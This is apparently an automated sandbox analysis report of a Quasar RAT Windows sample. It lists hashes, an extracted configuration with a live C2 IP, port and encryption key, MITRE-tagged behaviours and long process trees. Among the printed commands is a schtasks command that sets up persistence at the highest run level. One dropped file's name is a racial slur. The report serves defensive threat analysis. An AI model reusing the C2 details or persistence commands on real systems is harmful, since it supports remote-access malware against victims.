quasar | c01cbbfc12e2eb464749b1b833fc9cef153a85043860c14f9f82b15c93af236b

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27-11-2024 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe
Size

1.8MB
MD5

a949cfa0df19afe223bcf3c85c9c994c
SHA1

4e37b8c6d641f12b5c6298627ac59b446d30603f
SHA256

c01cbbfc12e2eb464749b1b833fc9cef153a85043860c14f9f82b15c93af236b
SHA512

2d81ef4c21c83deba1056987d32fc566fce334ab0bc33e761206f706d712dda0b86df2790e2eea595c3655b40ce3e670bdeb6e5347b6d66ce07aac86901c9c96
SSDEEP

49152:7JvrY9dvI0pGxxJgkuBFZb80NbC0oSVyl+8A3HLdH8K2deEu9:7JrAmBx3gkGb3Tkl+8AbdH8K2deEu

Score

10^/10

quasar google discovery execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

2.8.0.1

Botnet

Google

195.58.39.73:8153

Mutex

TgBckCMfOyU9mqcNCL

Attributes

encryption_key
hnmagnthArNq3kWAkoeG
install_name
svhost.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Chrome.exe

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0007000000012115-5.dat	family_quasar
behavioral1/memory/2688-17-0x0000000000210000-0x000000000030C000-memory.dmp	family_quasar
behavioral1/memory/1972-26-0x0000000001060000-0x000000000115C000-memory.dmp	family_quasar

Executes dropped EXE 64 IoCs

pid	Process
2688	NiggerRiggerDiggerBigger.exe
3008	Koid (2).exe
1972	svhost.exe
1544	svhost.exe
1000	svhost.exe
2616	svhost.exe
112	svhost.exe
2440	svhost.exe
1476	svhost.exe
2856	svhost.exe
3052	svhost.exe
2076	svhost.exe
1440	svhost.exe
1780	svhost.exe
2904	svhost.exe
2752	svhost.exe
3060	svhost.exe
2132	svhost.exe
1960	svhost.exe
1148	svhost.exe
2552	svhost.exe
780	svhost.exe
916	svhost.exe
1500	svhost.exe
1588	svhost.exe
1772	svhost.exe
912	svhost.exe
2336	svhost.exe
1032	svhost.exe
1312	svhost.exe
3020	svhost.exe
892	svhost.exe
1228	svhost.exe
2380	svhost.exe
1648	svhost.exe
1576	svhost.exe
536	svhost.exe
2436	svhost.exe
3028	svhost.exe
2404	svhost.exe
2080	svhost.exe
1624	svhost.exe
1660	svhost.exe
1112	svhost.exe
1304	svhost.exe
2508	svhost.exe
816	svhost.exe
1568	svhost.exe
1044	svhost.exe
2220	svhost.exe
2520	svhost.exe
2852	svhost.exe
2264	svhost.exe
2592	svhost.exe
988	svhost.exe
2620	svhost.exe
3032	svhost.exe
2980	svhost.exe
2080	svhost.exe
2400	svhost.exe
2084	svhost.exe
1112	svhost.exe
1304	svhost.exe
1796	svhost.exe

Loads dropped DLL 3 IoCs

pid	Process
2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe
2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe
2688	NiggerRiggerDiggerBigger.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Chrome.exe = "C:\\Windows\\SysWOW64\\svhost.exe"	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1600	powershell.exe
1592	powershell.exe
608	powershell.exe
2800	powershell.exe
2944	powershell.exe
2544	powershell.exe
1648	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\svhost.exe	NiggerRiggerDiggerBigger.exe
File opened for modification	C:\Windows\SysWOW64\svhost.exe	NiggerRiggerDiggerBigger.exe
File opened for modification	C:\Windows\SysWOW64\svhost.exe	svhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1856	schtasks.exe
2476	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe
1972	svhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1504	WScript.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeSecurityPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeBackupPrivilege	2688	NiggerRiggerDiggerBigger.exe
Token: SeDebugPrivilege	1972	svhost.exe
Token: SeDebugPrivilege	1972	svhost.exe
Token: SeDebugPrivilege	584	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1972	svhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 2688	2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe	30
PID 2132 wrote to memory of 2688	2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe	30
PID 2132 wrote to memory of 2688	2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe	30
PID 2132 wrote to memory of 2688	2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe	30
PID 2132 wrote to memory of 3008	2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe	31
PID 2132 wrote to memory of 3008	2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe	31
PID 2132 wrote to memory of 3008	2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe	31
PID 2132 wrote to memory of 3008	2132	a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe	31
PID 2688 wrote to memory of 2476	2688	NiggerRiggerDiggerBigger.exe	34
PID 2688 wrote to memory of 2476	2688	NiggerRiggerDiggerBigger.exe	34
PID 2688 wrote to memory of 2476	2688	NiggerRiggerDiggerBigger.exe	34
PID 2688 wrote to memory of 2476	2688	NiggerRiggerDiggerBigger.exe	34
PID 2688 wrote to memory of 1972	2688	NiggerRiggerDiggerBigger.exe	36
PID 2688 wrote to memory of 1972	2688	NiggerRiggerDiggerBigger.exe	36
PID 2688 wrote to memory of 1972	2688	NiggerRiggerDiggerBigger.exe	36
PID 2688 wrote to memory of 1972	2688	NiggerRiggerDiggerBigger.exe	36
PID 1972 wrote to memory of 1856	1972	svhost.exe	37
PID 1972 wrote to memory of 1856	1972	svhost.exe	37
PID 1972 wrote to memory of 1856	1972	svhost.exe	37
PID 1972 wrote to memory of 1856	1972	svhost.exe	37
PID 1972 wrote to memory of 1632	1972	svhost.exe	39
PID 1972 wrote to memory of 1632	1972	svhost.exe	39
PID 1972 wrote to memory of 1632	1972	svhost.exe	39
PID 1972 wrote to memory of 1632	1972	svhost.exe	39
PID 1972 wrote to memory of 1964	1972	svhost.exe	40
PID 1972 wrote to memory of 1964	1972	svhost.exe	40
PID 1972 wrote to memory of 1964	1972	svhost.exe	40
PID 1972 wrote to memory of 1964	1972	svhost.exe	40
PID 1972 wrote to memory of 1504	1972	svhost.exe	42
PID 1972 wrote to memory of 1504	1972	svhost.exe	42
PID 1972 wrote to memory of 1504	1972	svhost.exe	42
PID 1972 wrote to memory of 1504	1972	svhost.exe	42
PID 1972 wrote to memory of 1432	1972	svhost.exe	43
PID 1972 wrote to memory of 1432	1972	svhost.exe	43
PID 1972 wrote to memory of 1432	1972	svhost.exe	43
PID 1972 wrote to memory of 1432	1972	svhost.exe	43
PID 1972 wrote to memory of 2020	1972	svhost.exe	44
PID 1972 wrote to memory of 2020	1972	svhost.exe	44
PID 1972 wrote to memory of 2020	1972	svhost.exe	44
PID 1972 wrote to memory of 2020	1972	svhost.exe	44
PID 1996 wrote to memory of 2428	1996	explorer.exe	46
PID 1996 wrote to memory of 2428	1996	explorer.exe	46
PID 1996 wrote to memory of 2428	1996	explorer.exe	46
PID 1972 wrote to memory of 1116	1972	svhost.exe	47
PID 1972 wrote to memory of 1116	1972	svhost.exe	47
PID 1972 wrote to memory of 1116	1972	svhost.exe	47
PID 1972 wrote to memory of 1116	1972	svhost.exe	47
PID 1972 wrote to memory of 584	1972	svhost.exe	50
PID 1972 wrote to memory of 584	1972	svhost.exe	50
PID 1972 wrote to memory of 584	1972	svhost.exe	50
PID 1972 wrote to memory of 584	1972	svhost.exe	50
PID 1972 wrote to memory of 2868	1972	svhost.exe	52
PID 1972 wrote to memory of 2868	1972	svhost.exe	52
PID 1972 wrote to memory of 2868	1972	svhost.exe	52
PID 1972 wrote to memory of 2868	1972	svhost.exe	52
PID 1972 wrote to memory of 2836	1972	svhost.exe	55
PID 1972 wrote to memory of 2836	1972	svhost.exe	55
PID 1972 wrote to memory of 2836	1972	svhost.exe	55
PID 1972 wrote to memory of 2836	1972	svhost.exe	55
PID 1972 wrote to memory of 2384	1972	svhost.exe	57
PID 1972 wrote to memory of 2384	1972	svhost.exe	57
PID 1972 wrote to memory of 2384	1972	svhost.exe	57
PID 1972 wrote to memory of 2384	1972	svhost.exe	57
PID 1972 wrote to memory of 1344	1972	svhost.exe	59

C:\Users\Admin\AppData\Local\Temp\a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a949cfa0df19afe223bcf3c85c9c994c_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Users\Admin\AppData\Roaming\NiggerRiggerDiggerBigger.exe
  "C:\Users\Admin\AppData\Roaming\NiggerRiggerDiggerBigger.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Chrome.exe" /sc ONLOGON /tr "C:\Windows\SysWOW64\svhost.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2476
- - C:\Windows\SysWOW64\svhost.exe
    "C:\Windows\SysWOW64\svhost.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1972
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Chrome.exe" /sc ONLOGON /tr "C:\Windows\SysWOW64\svhost.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1856
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:1632
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"
      4⤵
      PID:1964
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"
      4⤵
      Suspicious behavior: GetForegroundWindowSpam
      PID:1504
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1544
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1000
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2616
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:112
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2440
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1476
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2856
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:3052
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2076
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1440
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1780
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2904
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2752
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:3060
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2132
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1960
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1148
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2552
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:780
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:916
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1500
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1588
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1772
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:912
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2336
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1032
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1312
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3020
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:892
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1228
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2380
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1648
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1576
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:536
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2436
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:3028
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2404
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2080
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1624
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1660
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1112
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1304
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2508
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:816
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1568
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1044
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2220
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
